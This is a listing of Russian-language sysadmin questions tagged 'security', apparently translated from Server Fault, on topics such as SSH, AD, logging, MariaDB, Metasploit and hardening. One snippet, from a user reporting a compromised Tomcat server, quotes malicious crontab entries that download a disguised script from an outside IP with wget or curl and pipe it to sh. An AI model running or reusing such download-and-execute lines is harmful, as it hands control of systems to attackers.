Вопросы с тегом «security»

Мне бы хотелось, чтобы один набор пользователей проходил аутентификацию с использованием аутентификации с открытым ключом, а другие пользователи использовали аутентификацию по паролю. Возможно ли это в OpenSSH в Linux? Если да, то как мне это сделать? После просмотра /etc/ssh/sshd_configкажется, что я ограничен включением аутентификации по ключу или использованием PAM.

9 linux  security  ssh 

Я хотел бы Самайн контролировать файл, скажем , к примеру, /root/somefile. Этот файл в настоящее время не существует, но я хотел бы получить уведомление, если он будет создан в любой момент. Я добавляю это к samhainrc: [ReadOnly] file = /root/somefile Это заставляет Samhain выдавать следующие записи журнала: Oct 18 22:54:04 …

8 linux  security  intrusion-detection 

У меня около 200 пользователей. 50 в Азии, 50 в южной и восточной Европе и около 100 в Западной Европе. Я хотел бы указать 50 пользователей, которые находятся в Азии, на наш DC в Азии, и в настоящее время кажется, что они проходят аутентификацию на наших европейских серверах, что вызывает …

8 windows  windows-server-2008  active-directory  security 

Во время запуска проекта войны на сервере Apache Tomcat я обнаружил, что сервер был взломан. Пока бежит война, неизвестный cronбежит вот так [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh Загруженный logo.jpgимеет скрипт оболочки, который …

8 linux  shell  security  tomcat 

Закрыто. Этот вопрос не по теме . В настоящее время он не принимает ответы. Хотите улучшить этот вопрос? Обновите вопрос, чтобы он соответствовал теме отказа сервера. Закрыто 3 года назад . Какой самый простой способ получить уведомление, когда определенные события появляются в журналах Windows - где угодно в сети Windows.

8 security  windows-event-log 

Я только что установил MariaDbна свежий Ubuntu Gnome и впоследствии запустил mysql_secure_installation, где я установил приличный пароль администратора, удалил анонимного пользователя и т. Д. После этого я понял странное поведение в отношении пароля администратора: Если я пытаюсь войти с моей обычной учетной записи пользователя с помощью команды, mysql -u root …

8 security  mariadb  authorization 

Свежий метасплоит на kalilinux 2016 (последняя стабильная версия) systemctl start postgresql OK На msfconsole msf > db_status [*] postgresql connected to msf Когда я запускаю поиск msf > search samba [!] Module database cache not built yet, using slow search Поэтому я перестраиваю кеш ... msf > db_rebuild_cache И когда …

8 linux  security 

Этот вопрос относится к ветке @ SwiftOnSecurity в Twitter: https://twitter.com/SwiftOnSecurity/status/655208224572882944. Прочитав ветку, я все еще не совсем понимаю, почему вы хотите отключить сетевой вход в систему для локальных учетных записей. Так вот что я думаю, пожалуйста, поправьте меня, где я не прав: Скажем, у меня AD, настроенный с DC и …

8 windows  active-directory  security  group-policy  windows-server-2012-r2 

Предыстория : удаленное объединение журналов рассматривается как способ повышения безопасности. Как правило, это устраняет риск того, что злоумышленник, взломавший систему, сможет редактировать или удалять журналы, чтобы сорвать судебный анализ. Я изучал параметры безопасности в общих инструментах журнала. Но что-то не так. Я не вижу, как настроить какой-либо из распространенных удаленных …

8 security  logging  rsyslog  logstash  syslog-ng 

У меня есть выделенный сервер Debian. Я пытаюсь обезопасить его, и я подумал, что было бы неплохо закрыть сервисы, которые мне не нужны, например, FTP. Я предлагаю запустить что-то вроде этого при развертывании: service ntp stop update-rc.d -f ntp remove service vsftpd stop update-rc.d -f vsftpd remove service xinetd stop …

8 linux  security  debian 

Срок действия моей бесплатной учетной записи AWS истек. Я удалил все ресурсы S3 и EC2, но я забочусь, если смогу покинуть Key Pairsи Security Groupsне платить за них. (Ресурсы моей учетной записи теперь выглядят так: Ресурсы ) Документация Amazon, похоже, не упоминает эту проблему. Эти ресурсы стоят денег?

8 security  amazon-ec2  amazon-web-services  amazon-s3  resources 

У нас уже есть сертификат подстановочного знака для *.mycompany.com. В нашей сети есть хосты, которые доступны только внутри. Все они принадлежат internal.mycompany.comподдомену. Существует частный сервер с именем хоста, server.internal.mycompany.comна котором я развернул наш подстановочный сертификат. Когда я посещаю веб-сервер, я получаю ошибку несоответствия имени хоста. Действительно ли мне нужно получить …

8 security  ssl-certificate  subdomain  domain 

Подумайте о компании веб-хостинга, которая хочет позволить пользователям управлять файлами и репозиториями git через ssh. Это включает в себя: защищенная копия (scp) создание, копирование, перемещение / переименование и удаление файлов выполнение небольшого набора команд для управления исходным кодом и редактирования текста (git, vim, nano) Мы хотели бы реализовать это и …

8 linux  security 

Я видел упоминание о безопасности / dev / shm и / proc, и мне было интересно, как вы это делаете и из чего состоит? Я предполагаю, что это включает в себя /etc/sysctl.conf редактирование некоторого вида права. Как это? kernel.exec-shield = 1 kernel.randomize_va_space = 1

8 linux  security  kernel 

За последние несколько дней один из наших полу-занятых почтовых серверов (sendmail) имел множество входящих подключений от хостов, которые выдают команды мусора. В последние два дня: входящие соединения SMTP с недействительными командами с 39 000 уникальных IP-адресов IP-адреса поступают из разных диапазонов по всему миру, а не только из нескольких сетей, …

8 linux  security  smtp  sendmail